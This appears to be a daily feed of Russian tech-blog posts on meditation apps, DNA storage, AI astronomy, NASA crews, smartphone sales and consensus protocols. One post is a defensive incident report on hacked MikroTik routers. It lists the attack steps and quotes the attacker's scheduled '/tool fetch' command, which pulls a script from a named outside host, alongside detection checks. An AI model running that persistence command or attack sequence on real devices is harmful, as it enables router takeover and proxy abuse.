...
суббота, 4 августа 2018 г.
Ситуация: приложения для медитации становятся успешнее, чем подкасты
Слушатели подкастов — молодые и образованные люди, многие из которых пользуются видеосервисами по модели платной подписки. Тем не менее, создателям платформ для подкастов зачастую не удается монетизировать свои аудиоприложения по аналогичной схеме.
Тем не менее, на рынке аудиоприложений появился другой игрок с «разговорным» контентом, который успешно получает доход за счет продажи подписок. Это приложения для медитации.
Разберемся, в чем похожи, а чем отличаются эти игроки в этой нише аудиоконтента.
Фото Tina Leggio / CC
Что произошло с рынком аудиоприложений
В то время как приложения для подкастов на протяжении нескольких лет только стремятся к созданию универсальной платформы с платной подпиской по модели Netflix, приложениям для медитации это уже удается. Этот факт отмечают в первую очередь инвесторы — поэтому охотнее вкладываются именно в сегмент приложений с «медитативным» аудиоконтентом.
Для сравнения: самые успешные платформы для подкастов с функцией платной подписки получили инвестиции не более чем в 36 миллионов долларов (в компанию Acast инвесторы вложили 35,2 млн долларов, а в Castbox — 29,6 млн). При этом объем инвестиций в самое успешное приложение для медитации с платной подпиской — Headspace — составляет 75,2 млн.
Рыночная оценка двух наиболее крупных компаний в сфере аудиоконтента для медитаций — Calm и Headspace — превышает 250 миллионов долларов для каждой. Платформы для подкастов по этому показателю тоже отстают — тот же Acast оценивают «всего лишь» в 131 миллион долларов.
Хотя есть критерий, по которому сегмент подкастов все-таки оказывается в более выигрышной позиции, — совокупный объем аудитории слушателей. Индустрия подкастов в западных странах достаточно развита: согласно исследованию Infinite Dial 2018 года, 26% американцев (73 миллиона человек) слушают подкасты минимум раз в месяц. Исследование Acast в Великобритании показало, что 23% населения (15,1 миллиона человек) хотя бы раз слушали подкасты за месяц, предшествовавший опросу.
В сравнении с этими цифрами аудитория приложений для медитации пока не так велика: Headspace утверждает, что их сервисом пользуются почти 30 миллионов человек по всему миру, а Calm приводит показатель в 25 миллионов пользователей.
Чем живет рынок приложений для медитации
Несмотря на то, что среди пользователей приложения для медитации не так широко распространены, это не мешает им активно захватывать рынок аудиоконтента. Сервисы для медитации и повышения осознанности набирают популярность на протяжении последних нескольких лет, но в 2017 и 2018 годах этот рост ускорился. В 2017 году Calm вошло в список лучших приложений года от Apple, а внимание к психическому здоровью стало одним из трендов года по версии компании.
По оценке Apptopia, количество скачиваний 10 самых популярных приложений категории self-care выросло на 36% по сравнению с аналогичным периодом прошлого года, а доход — на 40%. Приложениям удается популяризовать медитацию и сделать её частью повседневной жизни людей. Всего, по оценкам американской организации National Center for Complementary and Integrative Health, медитацию практикуют 8% взрослых американцев (18 миллионов человек).
Большинство приложений для медитации представляет собой подборку аудиоинструкций для конкретной ситуации и времени. Некоторые сервисы могут создавать рекомендации на основе эмоций и самочувствия пользователя. Поэтому основной моделью монетизации приложений для медитации является премиум-подписка. Это работает, потому что пользователи готовы платить за: 1) отбор контента под конкретные потребности и 2) удобный сервис, который не требует от них самостоятельного поиска аудио.
На чем зарабатывают приложения для подкастов
В отличие от приложений для медитации, платформы для подкастов практически не занимаются курированием контента и облегчением задачи поиска подходящего под ситуацию/настроение подкаста. Разумеется, подкасты могут быть сгруппированы по тематике, однако предлагать выпуск, подходящий под настроение или самочувствие, платформа не будет.
В первую очередь это связано с тем, что сервисы для прослушивания подкастов по большей части выступают в качестве агрегаторов контента, который создают независимые авторы. За счет такого подхода, с одной стороны, аудиозаписей на платформе становится больше, с другой — управлять ими на уровне, доступном приложениям для медитации, оказывается практически невозможно.
В этой ситуации заработать на аудиоконтенте стараются и авторы, и сами платформы. Подкастеры часто включают в свои выпуски нативную рекламу или принимают добровольные пожертвования от фанатов. Платформы привлекают рекламодателей и экспериментируют с моделями подписки. Например, за ежемесячную плату предоставляют пользователям ранний доступ к выпускам любимых подкастов, бонусные материалы и отсутствие рекламы в самом приложении.
Фото Kertojan ääni CC
Правда, пока желающих получить такой доступ, да и в целом ежемесячно платить за подкасты, оказывается немного. В том числе и из-за того, что слушатели могут не ассоциировать платформу с «ее содержанием», и готовы поддерживать отдельных подкастеров, но не приложение-агрегатор.
Что происходит с индустрией аудиоприложений в России
Пользователи аудиоприложений в России изучены не так хорошо как за рубежом. Для нашего рынка пока не проводились масштабные исследования по числу слушателей подкастов и аудиомедитаций, поэтому точный объем индустрии оценить сложно.
О приложениях для медитаций и осознанности на русском языке начали активно писать с 2015–2016 года [vc.ru, Афиша, Meduza]. Однако несмотря на растущую популярность, создатели приложений не поддерживают тенденцию повышения «языковой доступности» аудиомедитаций для россиян. Среди популярных приложений уроки на русском языке можно найти, пожалуй, только в Insight Timer.
Подкасты в России намного более распространены и известны. Основные модели монетизации аудиопередач в России, как и на Западе, — реклама и пожертвования. Рекламодатели сейчас сотрудничают с наиболее крупными и старыми из передач. Помимо этого, российские подкастеры продают другие свои услуги и курсы или устраивают платное участие в эфире гостям.
Что до модели платной подписки, то ее на своей платформе реализует, к примеру, Arzamas: часть материалов в приложении доступна бесплатно, а подписка открывает для пользователей уникальный контент. Правда, в данном случае мы все-таки имеем дело не с платформой-агрегатором стороннего контента, а с курируемым контентом, предоставляемым самой площадкой.
Кстати, свой сервис для размещения подкастов до конца 2018 планирует запустить и «ВКонтакте». О модели заработка компания пока не рассказывает, но известно, что она будет отличаться от существующей монетизации аудиозаписей в социальной сети. Возможно, отечественный рынок станет той стартовой площадкой, на которой платформам для подкастов все-таки удастся запустить формат «аудио-Netflix».
Дополнительные материалы из нашего «Мира Hi-Fi»:
«Массовый продукт»: первое коммерческое ДНК-хранилище представят в 2019 году
Далее расскажем о подходе, используемом Catalog, и других свежих разработках на ДНК-поприще.
/ фото University of Michigan CC
Подробности проекта
Классический подход к записи данных в ДНК предполагает преобразование последовательности битов ― нулей и единиц ― в последовательность из четырех базовых оснований ДНК. Например, азотистые основания аденин (A), тимин (T), гуанин (G) и цитозин ( С) можно представить так: A = 00, T = 01, G = 10, C = 11.
Пользуясь этим подходом, в 2016 году компании Microsoft удалось «увековечить» 200 Мбайт текста и видео в синтетических молекулах ДНК (о чем мы уже писали в одном из постов). Однако такой способ плохо подходит для массовой записи данных, при этом являясь дорогостоящим.
Вместо того чтобы использовать миллионы ДНК-цепочек, исследователи из Catalog предлагают генерировать большое количество различных ДНК-молекул, состоящих не более чем из 30 пар оснований. Затем за счет ферментативных реакций эти предварительно подготовленные «кусочки» формируют особые паттерны, которые и кодируют информацию. Таким образом, вместо того чтобы представлять одно азотистое основание, биты выстраиваются в многомерные матрицы. А группы молекул отражают положение битов в этих матрицах.
Девин Лик (Devin Leake), руководитель исследовательского направления Catalog, приводит следующую аналогию: «Представьте, что у вас есть книга. Вы можете скопировать её вручную: букву за буквой. Точно также можно писать данные в ДНК ― молекулу за молекулой. Этот подход использовали в Microsoft. Мы же предлагаем создать своеобразный «печатный станок», где молекулы ДНК будут гарнитурой. Таким образом, переставляя предварительно сгенерированные молекулы, мы работаем сразу с целыми словами, расставляя их в нужном порядке».
Используя этот метод, исследователи из Catalog успешно записали и восстановили данные в ДНК. Для этого они использовали стихотворение The Road Not Taken (в одном из переводов ― «Другая дорога») Роберта Фроста. Сейчас компания решает задачу масштабирования платформы под нужды ИТ-компаний и правительственных организаций.
По словам одного из основателей Catalog Хинджана Парка (Hyunjun Park), такой подход позволит сделать терабайтные ДНК-хранилища коммерчески выгодными уже к началу 2019 года. Однако точная стоимость услуги хранения данных, которую будет предлагать стартап, пока неизвестна.
Аналогичные разработки
Как уже было отмечено, вопросами создания ДНК-хранилищ занимаются в Microsoft. И с 2016 года исследователи из компании продвинулись в своих разработках: в феврале 2018 они создали «библиотеку праймеров» для организации произвольного доступа к ДНК. Каждый из праймеров «привязан» к конкретной цепочке, потому с помощью полимеразной цепной реакции можно выбрать любую из них (и получить доступ к записанным данным).
/ фото Col Ford and Natasha de Vere CC
В компании надеются, что такой подход вкупе с новым, менее восприимчивым к ошибкам алгоритмом записи и чтения данных, в будущем поможет создать ДНК-хранилища объемом в несколько терабайт. В планах ИТ-гиганта предоставлять ДНК-хранилище as a service. Компания задалась целью осуществить задумку к 2020 году.
Взаимовыгода ДНК и AI
С записью информации на ДНК-носитель уже нет особых трудностей: компании придумали способы автоматизации. А вот процесс считывания информации по-прежнему сложен и требует много времени. Чтобы решить и эту проблему компания Lifebit планирует использовать системы ИИ. В Lifebit разрабатывают облачную платформу Deploit на базе алгоритмов МО, которая позволит автоматизировать процесс чтения информации из ДНК-носителей.
Таким образом, машинное обучение поспособствует в организации ДНК-хранилищ. Однако справедливо и обратное ― молекулы ДНК используются для создания систем искусственного интеллекта. Например, в этой сфере работают исследователи из Caltech.
Принцип работы их нейронной сети основан на химических реакциях, получивших название смещение нитей (механизм репликации ДНК, известный у некоторых вирусов), когда нить, называемая входящей, вытесняет одну из нитей оригинальной ДНК. «Интеллектуальную систему» уже научили распознавать цифры, написанные от руки.
Цифра отрисовывается на квадратной плоскости, разделенной на сто одинаковых ячеек (10x10) ― своеобразные пиксели. Каждая из этих ячеек представлена молекулой ДНК, которая «знает», есть ли на этом пикселе кусочек цифры. После все молекулы смешивают в одной пробирке, и «ДНК-сеть» дает свой ответ с помощью флуоресцентных сигналов. Пробирка начинает излучать свечение, цвет которого зависит от распознанной цифры. Например, зеленый и желтый цвета означают цифру пять, а зеленый и красный ― цифру девять.
В планах исследователей сформировать у нейронной сети некое подобие памяти, чтобы она «запоминала» обучающие векторы и использовала их для решения других задач.
O Catalog
Catalog ― это американский стартап, основанный в 2016 году, который занимается разработкой технологий хранения данных в молекулах ДНК. Штаб-квартира располагается в Бостоне, Массачусетс.
P.S. Пара дополнительных материалов из Первого блога о корпоративном IaaS:
P.P.S. Другие посты по теме из нашего блога на Хабре:
[Из песочницы] Как мы учили ИИ распознавать скопления галактик
Недавно, вместе с командой друзей-астрофизиков, я закончила проект, целью которого был поиск далеких, скрытых тканью космоса галактик и их скоплений. Сейчас я поделюсь с вами тем, что мы сделали в результате этой непростой работы.
Анализ данных
Галактики и их скопления – крупномасштабные объекты видимой части Вселенной, поэтому результаты посвященных им исследований представляют ценную информацию для расширения области знания о различных масштабных структурах, позволяют проследить эволюцию масс скоплений и выявить особенности формирования современного вида Вселенной. Подробнее об этом я расскажу в следующих статьях (если вам будет интересно).
Для анализа гигантского объема информации, поступающей с телескопов, хотя бы на наличие галактик требуется автоматический механизм (или больше астрономов). Можно написать программу, выполняющую эту задачу. Но как научить её отличать галактики и их скопления от других объектов космоса?
Нам повезло, в космосе нашлось место для «магии», а конкретно для эффекта Сюняева-Зельдовича, открытом еще в прошлом веке.
Эффект заключается в следующем: изначально фотоны реликтового излучения не энергичны, как ленивец на ветке эвкалипта, но после взаимодействия с электронами, обладающими большим количеством энергии внутри газа, их энергия возрастает за счет температуры горячего газа в скоплении, который разогревается при адиабатическом сжатии либо под действием сил гравитации, либо при столкновении галактик и облаков межгалактического вещества.
Рис. 1. Эффект Сюняева — Зельдовича.
За счет увеличения энергии, фотон увеличивает свою частоту и переходит из миллиметрового диапазона в субмиллиметровый. В этот момент в направлении на скопления галактик фотонов реликтового излучения с заданной температурой в миллиметровом диапазоне не хватает, поэтому в направлении на скопление галактик там наблюдается провал по отношению к среднему фону. А в субмиллиметровом диапазоне, наоборот, избыток фотонов и локальный пик.
Проявляется это так: эффект космического микроволнового фона (т.е. равномерно заполняющего Вселенную теплового излучения, далее CMB), наблюдаемый вдоль линии скопления галактик, выглядит слабее на низких частотах и ярче на высоких.
Таким образом, под влиянием эффекта фон преобразуется в отрицательный сигнал для частот ниже порога (рис. 2, изображение слева) и положительный сигнал для частот выше порога с отсутствием сигнала на нулевой частоте 217 ГГц (рис. 2, изображение справа). Эта особенность эффекта и позволяет астрономам находить кластеры галактик и сверхскопления в микроволновой области спектра.
Чем не магия?
Рис. 2. Влияние эффекта Сюняева-Зельдовича на видимые свойства скоплений галактик
Экспериментальные доказательства существования эффекта были получены совсем недавно, когда на телескопе Planck астрофизики проводили исследования электромагнитного спектра и обратили внимание на то, что на одних частотах наблюдаемая область неба кажется «пустой», а на других на ней вырисовываются целые скопления галактик.
Рис. 3. Это первое сверхскопление, открытое с помощью эффекта Сюняева-Зельдовича. Слева — изображение, полученное «Планком». Правая панель показывает изображение, полученное с помощью обсерватории «XMM-Ньютона».
Это все здорово, но что сделали мы?
Знаете, часто возникают ситуации, когда вы принимаете решение заняться чем-либо просто потому, что вам это нравится, хотя вы предполагаете, что это не понадобится в будущем. Это была такая же ситуация.
Когда текст для основной части работы был написан и оставалось совсем немного времени для оформления результатов, а до дедлайна оставалось чуть меньше недели, я сидела перед монитором и не знала, что делать. Мне иногда даже нравятся такие ситуации, потому что только в них приходится решать задачу на оптимальную стратегию. Я понимала, что распознать большое количество данных (около 10 000 изображений) не смогу физически, а за моими плечами только три пройденных курса, один из которых меня как раз и выручил. Курс посвящен работе с Inception, свёрточной нейросетью компании Google, который я когда-то прошла «для саморазвития» (ссылка в конце статьи).
Для работы с нейронной сетью использовано программное обеспечение Anaconda 2, язык программирования Python 2.7, библиотека Keras для работы с машинным обучением и большими данными и Theano для работы с числовыми данными.
Конечно без советов людей, которые занимаются машинным обучением в течение двух лет, не обошлось. Поэтому через четыре дня у нас была программа для работы с нейросетями глубокого обучения.
Сеть состоит из последовательностей сверточных слоев (CL) и слоев объединения (PL). Сверточные слои позволяют извлекать несколько карт признаков из входных изображений, а слои объединения выполняют заданную подвыборку на картах функций.
Эти последовательности слоев соответствуют этапу выделения признаков. Для классификации изображений выходной уровень является полностью связанным слоем с числом единиц, равным количеству классов. Сеть построена по базовой архитектуре с двумя этапами свертки (особого вида интегрального преобразования) и подвыборки, подключенными к классификатору, что представлено на рисунке.
Рис. 4. Архитектура нейронной сети
Обучение сети происходило без учителя. Каталоги фотографий для обучения сети и дальнейшего распознавания скоплений галактик составлен с помощью GLESP — схемы пикселизации карт космического микроволнового фона, которая создает строгое ортогональное разложение отображения. Для создания каталога обучения нейронной сети использованы данные с миссии телескопа Planck, целью которой был поиск галактик и их скоплений при помощи эффекта Сюняева-Зельдовича. Данные с миссии представлены в виде 6 135 изображений, сделанных на частотах 100, 143, 217, 353 и 545 ГГц.
Одни из результатов работы сети представлены на рисунке 5. И, о чудо, мы нашли интересное скопление.
Рис. 5. Результаты работы сети
Программа была применена к каталогу изображений разных участков неба и в настоящее время анализирует их на наличие галактик и их скоплений.
В перспективе проекта мы будем более подробно изучать принцип влияния эффекта Сюняева-Зельдовича на видимые свойства крупномасштабных объектов Вселенной и создадим универсальный аналитический алгоритм для более подробного изучения космических объектов.
Я очень надеюсь, что это небольшая статья хоть на минутку перенесла вас в чудесный мир космоса. До встречи в следующих статьях!
Полезные ссылки:
- Курс по Inception
- О. В. Верходанов, Н. В. Верходанова, О. С. Улахович и др., Астрофизическая бюллетень, том 73, 1, 2018
- Ostriker, Jeremiah P., Ethan T., Nature, 322 (6082): 804, 1986
- Passmoor S., Cress C., MNRAS, 397 (1), 2009
- Planck Collaboration, Astron. Astrophys.571, A29, 2014
[Перевод] Сформированы экипажи для космических кораблей Boeing и SpaceX
3 августа 2018 года в Космическом центре NASA имени Линдона Джонсона, Хьюстон, публике представили девятку астронавтов, кто первыми отправится в космос на новых космических кораблях, произведённых американскими частными корпорациями. Слева направо: Виктор Гловер, Майк Хопкинс, Боб Бенкен, Дуг Харли, Николь Онапу Манн, Крис Фергуссон, Эрик Боу, Джон Кассада и Суни Уильямс. Они отобраны агентством для испытательных полётов и пилотируемых миссий Boeing CST-100 Starliner и SpaceX Crew Dragon. Источник фото: Bill Ingalls/NASA
HOUSTON — с этого момента зовите их «Коммерческая Команда Девять». NASA торжественно объявило имена тех, кто полетит на частных космических кораблях, построенных SpaceX и Boeing; прозвучала даже фраза, что это «ребята что надо» — когда-то, в 1959 году, говорили про первый набор американских астронавтов, «Семёрку „Меркурия“.
Анонс проводили вчера (3 августа) в Космическом центре NASA имени Линдона Джонсона; перед толпой конгрессменов, чиновников различного ранга и детишек, размахивающих звёздно-полосатыми флагами, наконец предстали восемь человек из NASA и один из Boeing. Они снова отправятся на орбиту со стартовых площадок в США, чего не происходило со времён закрытия программы „Шаттл“ в 2011 году.
»Это громадный успех для нашей страны, и мы хотим донести до каждого американца — мы снова в седле", — сказал зрителям администратор агентства Джим Брайденстайн — «Мы запускаем астронавтов на американских ракетах с территории Америки». [Познакомьтесь с экипажами SpaceX и Boeing]
Пожалуй, вряд ли какое-то событие ждут с таким нетерпением, как испытательные пилотируемые полёты Boeing и SpaceX. Пока что запланировано четыре полёта к МКС в течение 2019 года — два на Crew Dragon и два на CST-100 Starliner — сразу после того, как закончатся беспилотные запуски.
На CST-100 первыми полетят: от NASA — Эрик Боу, Николь Онапу Манн; от Boeing — Крис Фергуссон. Фергуссон — бывший астронавт агентства и командир экипажа «шаттла», перешедший в Boeing для работы над программой Starliner. Если всё пойдёт по плану, их миссия состоится в середине 2019 года.
Астронавт Суни Уильямс приветствует публику после того, как назвали её имя среди участников «Коммерческой Команды Девять», 3 августа 2018 года. Источник фото: Bill Ingalls/NASA
Ветераны NASA Боб Бенкен и Дуг Харли первыми полетят на Crew Dragon. Их миссия запланирована на апрель 2019 года.
«Вне всякого сомнения, такая возможность выпадает раз в жизни», — говорит Николь Манн, бывший лейтенант Корпуса Морской Пехоты, пришедшая в NASA только в 2013 году — «Нет ничего лучше, чем стать пилотом-испытателем».
Харли согласен с ней: «Отправиться в первый полёт на абсолютно новой технике это мечта для любого пилота-испытателя, и всегда кажется, что с тобой этого никогда не произойдёт. Ну, как видите, всё-таки случается».
После успешного завершения тестовых пилотируемых полётов, ещё два экипажа отправятся к МКС для долговременного пребывания. На борту Starliner будут ещё один ветеран NASA Сунита Уильямс (бывший командир экипажа на МКС) и новичок Джон Кассада. Dragon же доставит к станции ветерана Майка Хопкинса вместе с ещё одним новичком Виктором Гловером.
Да уж, ребята прошли долгий путь ради этого момента. Длиной в годы, на самом деле.
Всё началось в сентябре 2014, когда агентство впервые анонсировало доставку астронавтов к МКС и обратно при содействии SpaceX и Boeing. Тогда SpaceX Crew Dragon (известный в то время Dragon V2) и Boeing Starliner (на тот момент просто CST-100) победили в соревновании длившемся четыре года — и получили контракты на миллиарды долларов — ради того, чтобы отправлять людей в космос. [Обзорная экскурсия по кораблю SpaceX Crew Dragon]
Затем, в июле 2015 года, NASA подкинуло другую новость, отобрав четверых для тренировок на Dragon и Starliner: это были Боу, Бенкен, Харли и Уильямс. С того момента астронавты, помимо работы в NASA, дополнительно тренировались у SpaceX и Boeing.
Вчерашнее заявление — важный этап для американской космонавтики, символизирующий возврат Америки к самостоятельным пилотируемым полётам. Последняя миссия «шаттла», STS-135 под командованием Фергуссона, состоялась ещё в июле 2011 года. С тех пор NASA было вынуждено арендовать места на российских «Союзах», оплачивая примерно по 70 миллионов долларов за единицу.
Некоторые новички, вроде Кассады, присоединились к NASA с ожиданием полететь хотя бы на «Союзе» до того, как появится какой-либо американский корабль. «Но я вам скажу: иметь возможность улететь к МКС с американской земли — это просто непередаваемое ощущение», — радуется Кассада.
Гловер, который тоже пришёл в NASA только в 2014 году, высказался просто: «Всё это словно сбывшийся сон… воплощение самых буйных фантазий пилота-испытателя».
Астронавт Виктор Гловер, «Коммерческая Команда Девять». Источник фото: Bill Ingalls/NASA
Crew Dragon стартует на РН Falcon 9, и оба аппарата позволяют повторное использование. CST-100 также планируется использовать повторно, а запущен он будет при помощи РН Atlas V компании United Launch Alliance. SpaceX поставила цель провести беспилотный тестовый полёт в ноябре текущего года, а такое же мероприятие у Boeing стоит в расписании на конец 2018-начало 2019 года. [Как устроен Boeing CST-100 Starliner]
Хотя, конечно, сроки могут сдвинуться. По правде говоря, они уже сдвинулись буквально на этой неделе.
В начале года NASA опубликовало план, согласно которому беспилотные полёты CST-100 и Crew Dragon должны были состояться как раз в августе; первые пилотируемые же миссии ожидались в конце 2018 года. Но в четверг, 2 августа, стало известно о смене дат.
По обновлённому графику, SpaceX проводит беспилотный полёт в ноябре текущего года, с последующим пилотируемым полётом весной 2019 года. Boeing, в свою очередь, надеется осуществить беспилотный полёт в конце 2018-начале 2019 года, а пилотируемый — в середине 2019 года. Пока что американские астронавты продолжат летать к МКС на российских «Союзах».
Вне зависимости от этого, NASA, SpaceX и Boeing регулярно акцентируют внимание публики на том, что корабли полетят только тогда, когда будут безусловно готовы.
Президент SpaceX Гвен Шотвелл как раз слегка коснулась этой темы во время представления экипажей. Исполнительный директор Илон Маск, сказала она, основал компанию в 2002 году в первую очередь для того, чтобы строить максимально надёжную и безопасную космическую технику.
«Семь тысяч работников SpaceX, как и мы, принимают словно великую честь возможность стать частью всего этого, доставить вас на орбиту», — обратилась Шотвелл к девятке — «И мы настроены всерьёз. Мы вас не подведём».
Новая уязвимость Mikrotik? Нет, но стоит проверить свои устройства
Второго августа получил рассылку “MikroTik: URGENT security advisory” о том, что некий ботнет использует уязвимость Winbox Service для взлома и заражения устройств.
Из текста рассылки стало ясно, что уязвимость закрыта еще 23 апреля 2018 года в версии v6.42.1. Начал проверять подшефные устройства и нашел несколько роутеров с 6.40.1, один из которых был заражен.
Что делает атакующий скрипт?
— Получает список пользователей через уязвимость (т.е. смена admin на что-то другое не спасает).
— Пытается зайти под всеми полученными логинами и отсеивает заблокированные.
— Найдя активный логин, получает его пароль, заходит в систему.
Затем:
— Отключает все drop правила на файрволле.
— Включает socks (IP – Socks) на нестандартном порте, в моем случае 4145.
— Добавляет скрипт /tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no в System – Scripts
— Добавляет запуск скрипта в System – Scheduler.
— Удаляет существующие скрипты (по сообщениям на форуме Mikrotik).
Атака шла с адреса 95.154.216.151, который принадлежит iomart Hosting Limited, написал им сообщение через сайт, но никакой реакции пока нет, адрес активен.
Адрес 95.154.216.166 так же активен, но файла mikrotik.php на нем нет.
Вот тут можно увидеть сообщения от пострадавших:
www.abuseipdb.com/check/95.154.216.151
www.abuseipdb.com/check/95.154.216.166
Если ваш Mikrotik еще не обновлен и порт Winbox открыт для всех, обязательно проверьте устройство.
1. Проверяем, что активны drop правила в IP – Firewall.
2. Проверяем socks, должен быть отключен и порт должен быть по умолчанию – 1080.
3. Проверяем наличие левых скриптов в System – Scripts и System – Scheduler.
4. Проверяем наличие файла miktorik.php
5. Делаем /export в терминале и проверяем конфигурацию глазами.
Пользователь gotsprings на форуме Mikrotik предложил такой вариант проверки:
:if ([/ip socks get port] = 1080) do={:log info "Socks port is still Default."} else={:log info "Socks Port changed Possible infection!"}
:if ([/ip socks get enabled] = false) do={:log info "Socks is not on."} else={:log info "Socks is enabled... that could be bad!"}
:if ([:len [/file find name="mikrotik.php"]] > 0) do={:log info "!!!mikrotik.php!!! File Detected!"} else={:log info "mikrotik.php not found."}
:if ([:len [/file find name="Mikrotik.php"]] > 0) do={:log info "!!!Mikrotik.php!!! File Detected!"} else={:log info "Mikrotik.php not found."}
:if ([:len [/user find name="service"]] > 0) do={:log info "!!!YOU WERE BREACHED!!!"} else={:log info "No sign of the service user."}
Open you log and look at the results. If you have a result with "!" you might have a problem.
Очевидно, что очень плохо держать открытый для всех Winbox Service, но в некоторых случаях это случается, не забывайте обновлять свои устройства!
Ссылки по теме:
forum.mikrotik.com/viewtopic.php?f=21&t=137572
thehackernews.com/2018/08/mikrotik-router-hacking.html
Huawei обогнал Apple по объему продаж. Капитализация американской компании все равно достигла $1 трлн
Изображение: Unsplash
Apple и Huawei подвели итоги третьего квартала финансового года — самого успешного в истории обеих компаний. В тройке лидеров мобильного рынка произошли изменения: по результатам на 30 июня 2018 года Huawei обогнал Apple по числу проданных смартфонов и занял второе место на рынке после Samsung. Apple, в свою очередь, заявили о росте выручки и побили рекорд капитализации.
Новые претенденты на лидерство
Борьба за лидерство на рынке смартфонов уже не просто противостояние Apple и Samsung: по данным IHS и Strategy Analytics, за период с апреля по июнь 2018 года доля Huawei возросла до 15%, сообщает Reuters. За прошедший квартал Huawei продали почти на 12% больше устройств, чем Apple, и сократили отставание от Samsung до 20%. Согласно отчету, выручка компании на 15% превышает результат за тот же период 2017 года.
Таблица: IDC.com
Huawei смогли оказаться на втором месте в мире по доле на рынке смартфонов не только за счет захвата 27% китайского рынка, являющийся самым большим в мире, но и увеличив международные продажи. По данным «Ведомостей» в июне 2018 года смартфоны Huawei Honor стали самыми продаваемыми в российских интернет-магазинах.
По мнению аналитиков, Huawei удалось опередить конкурентов, продавая более функциональные телефоны для своей ценовой категории. Выпущенная весной флагманская модель P20 Pro востребована и благодаря использованным инновациям: Huawei первыми оснастили устройство тремя камерами. По мнению российских ретейлеров такие аппараты привлекают прежде всего молодую аудиторию, любящую новинки и не относящуюся с предубеждением к китайским товарам.
Apple по-прежнему зарабатывает больше
Несмотря на то, что Huawei продается лучше айфонов, Apple также сообщают об успешном квартале. По данным Business Insider этот третий квартал стал самым прибыльным в истории компании. Хотя продажи продажи iPhone увеличились всего на 0,7%, за счет повышения средней стоимости iPhone до $724, выручка компании в данном сегменте, по-прежнему основном для Apple, возросла на 20% до $29,91 млрд.
В общей сложности выручка Apple в третьем квартале 2018 финансового года, который завершился в июне, выросла на 17% и достигла $53,3 млрд. Такие результаты превысили ожидания экспертов и обеспечили акциям Apple стабильный рост с момента публикации отчета.
2 августа 2018 года, сообщает BBC, Apple стала первой американской компанией, капитализация которой достигла $1 трлн.
Другие материалы по теме финансов и фондового рынка от ITI Capital:
Обзор актуальных протоколов достижения консенсуса в децентрализованной среде
Отметим, что в децентрализованной сети применяется принцип избыточности, который основан на том, что узлы могут делать одну и ту же работу. Для централизованной сети это, естественно, неэффективно, а для децентрализованной это является обязательным условием. Перейдем к базовым требованиям.
Требования к протоколам достижения консенсуса
Протоколы должны обеспечивать надежную работу пользователей в достаточно суровых условиях и при этом удовлетворить минимальным требованиям. Ниже перечислены основные.
Отсутствие центральной доверенной стороны. Сеть состоит из равноправных узлов. Если злоумышленник или третья сторона попытаются вывести из строя определенное количество узлов, то сеть продолжит нормально работать до тех пор, пока честные участники будут контролировать подавляющее большинство узлов сети.
Честные участники не знают, какие узлы контролируются злоумышленниками. Предполагается, что другие узлы могут в произвольные моменты времени выходить из строя или функционировать произвольным образом, в том числе координироваться злоумышленниками для проведения атаки на сеть. Опять же, честные участники не знают, какие из узлов честные, а какие сбойные, или ненадежные.
Предполагается, что сеть заведомо ненадежная. Некоторые сообщения могут быть доставлены с серьезной задержкой, а другие могут быть потеряны в сети и остаться вовсе недоставленными. Именно в таких условиях децентрализованный консенсус должен продолжать нормально функционировать: все честные узлы должны приходить к одному и тому же состоянию базы данных подтвержденных транзакций.
Протоколы должны быть полностью формальными. Никакого дополнительного участия человека быть не должно и никаких дополнительных данных не требуется. Все честные узлы должны приходить к одному и тому же решению, полностью следуя алгоритму, который выполняется компьютером.
Кроме того, существуют определенные допущения, при которых протокол гарантирует корректную работу. Честные узлы должны составлять большую часть всех участников: более ½ или ⅔ от общего их количества. Однако время принятия решения не ограничено. Ограничение может касаться количества шагов для принятия решения, но не времени.
Области применения протоколов достижения консенсуса
Цифровые валюты
В первую очередь это применимо к криптовалютам: в Bitcoin применяется алгоритм Nakamoto, в Ethereum применяется упрощенный вариант GHOST, в Bitshares реализован Delegated PoS и т. д.
Нужно отметить, что сообщество, которое поддерживает определенную цифровую валюту не всегда бывает многочисленным и децентрализованным. Существует ряд других цифровых валют, которые являются централизованными. Однако это не значит, что механизм достижения консенсуса не понадобится. Например, Ripple использует BFT-протокол в централизованной среде.
Высоконадежные и критические системы
Протоколы достижения консенсуса используются в высоконадежных вычислительных системах. Они могут использоваться для доступа к распределенным базам данных при построении кластеров, а также обязательно используются в критических технических системах: это могут быть системы управления авиационным оборудованием, системы управления ядерными реакторами, а также в космических технологиях.
В 2018 году, 6 февраля, произошел запуск Falcon Heavy. Было интересно наблюдать за ним и читать технические обзоры. Но не менее интересно было читать о том, какие алгоритмы достижения согласия использует команда. Инженеры вынуждены были использовать простую электронику, которая продается в обычных магазинах и не совсем надежно работает в сложных космических условиях. Поэтому они применяют многократную избыточность в своей работе и достижение консенсуса в данном случае необходимо.
Криптовалюты
Криптовалюты работают в peer-to-peer сетях. При этом сообщения или транзакции передаются между участниками сети в произвольные моменты времени. Предположим, что в сети есть участники, находящиеся в США, и участники, находящиеся в Австралии. Платежи, которые отправлены из США, участники из Америки увидят раньше, чем платежи, отправленные из Австралии. Это происходит из-за наличия серьезной, по компьютерным меркам, задержки при доставке сообщения с одного континента на другой. Аналогичной будет ситуация и для австралийцев, потому что они будут видеть платежи из Австралии раньше, чем платежи из США.
Описанная выше ситуация значит, что разные участники сети увидят в один момент времени увидят разное итоговое состояние базы данных с транзакциями. Поскольку транзакции приходят от пользователей к валидаторам в разное время, нужен протокол, который позволит каждому узлу вне зависимости от его места нахождения получить все транзакции в одном и том же порядке.
В основном для работы учетных систем криптовалют используется два подхода: PoW, который является наиболее распространенным, и PoS, который активно развивается в последнее время.
В PoW выполняется дополнительный объем работы, который сейчас заключается в поиске прообраза хеш-функции. Фактически здесь происходит искусственное замедление сети для обеспечения безопасности. Чтобы осуществить злонамеренное действие, злоумышленнику придется выполнить необходимый объем работы. Это требует колоссальных затрат энергии и делает реализацию атак не очень эффективной. За счет такого подхода обеспечивается надежность в работе сети. Однако необходимость выполнять настолько требовательную к ресурсам задачу ограничивает пропускную способность сети, которая работает по данному протоколу. Но над подходом PoW ученые продолжают трудиться и предлагать альтернативные схемы, а также другие ресурсоемкие задачи, помимо поиска прообраза хеш-функции. Недавно был предложен алгоритм на базе proof-of-space-and-time.
PoS позволяет обеспечить более высокую пропускную способность сети и не требует избыточных затрат электроэнергии, как PoW. Однако PoS требует более серьезного анализа при разработке и реализации криптовалюты.
